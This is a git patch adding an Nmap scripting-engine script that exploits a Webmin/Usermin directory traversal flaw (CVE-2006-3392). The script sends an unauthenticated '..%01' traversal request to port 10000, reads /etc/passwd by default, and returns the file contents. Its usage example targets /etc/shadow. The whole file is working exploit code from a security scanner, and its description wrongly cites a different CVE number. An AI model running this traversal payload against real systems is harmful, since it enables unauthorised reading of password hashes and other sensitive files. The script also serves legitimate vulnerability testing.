From 17ef614c49c7b2587e12ff91ce3979e079543a93 Mon Sep 17 00:00:00 2001 From: robert Date: Sun, 4 May 2014 15:00:06 +0000 Subject: [PATCH] Added Paul Amar's Webmin File Disclosure NSE script (CVE-2006-3392). --- scripts/http-vuln-cve2006-3392.nse | 80 ++++++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 scripts/http-vuln-cve2006-3392.nse diff --git a/scripts/http-vuln-cve2006-3392.nse b/scripts/http-vuln-cve2006-3392.nse new file mode 100644 index 000000000..f6e7b56a0 --- /dev/null +++ b/scripts/http-vuln-cve2006-3392.nse @@ -0,0 +1,80 @@ +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local vulns = require "vulns" + +description = [[ +Exploits a file disclosure vulnerability in Webmin (CVE-2010-0738) + +Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. +This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences +to bypass the removal of "../" directory traversal sequences. +]] +--- +-- @usage +-- nmap -sV --script http-vuln-cve2006-3392 +-- nmap -p80 --script http-vuln-cve2006-3392 --script-args http-vuln-cve2006-3392.file=/etc/shadow +-- @output +-- PORT STATE SERVICE REASON +-- 10000/tcp open webmin syn-ack +-- | http-vuln-cve2006-3392: +-- | VULNERABLE: +-- | Webmin File Disclosure +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2006-3392 +-- | Description: +-- | Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. +-- | This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences +-- | to bypass the removal of "../" directory traversal sequences. +-- | Disclosure date: 2006 +-- | Extra information: +-- | Proof of Concept:/unauthenticated/..%01/..%01/(..)/etc/passwd +-- | References: +-- | http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure +-- |_ http://www.exploit-db.com/exploits/1997/ +-- +-- @args http-vuln-cve2006-3392.file . Default: /etc/passwd +--- + +author = "Paul AMAR " +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +portrule = shortport.portnumber({10000}) + +action = function(host, port) + local file_var = stdnse.get_script_args(SCRIPT_NAME .. ".file") or "/etc/passwd" + + local vuln = { + title = 'Webmin File Disclosure', + state = vulns.STATE.NOT_VULN, -- default + IDS = {CVE = 'CVE-2006-3392'}, + description = [[ +Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML. +This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences +to bypass the removal of "../" directory traversal sequences. +]], + references = { + 'http://www.exploit-db.com/exploits/1997/', + 'http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure', + }, + dates = { + disclosure = {year = '2006', month = '06', day = '29'}, + }, + } + + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local url = "/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01" .. file_var + + stdnse.print_debug(1, "Getting " .. file_var) + + local detection_session = http.get(host, port, url) + + stdnse.print_debug(1, "Status code:"..detection_session.status) + if detection_session and detection_session.status == 200 then + vuln.state = vulns.STATE.EXPLOIT + stdnse.print_debug(1, detection_session.body) + return vuln_report:make_output(detection_session.body) + end +end \ No newline at end of file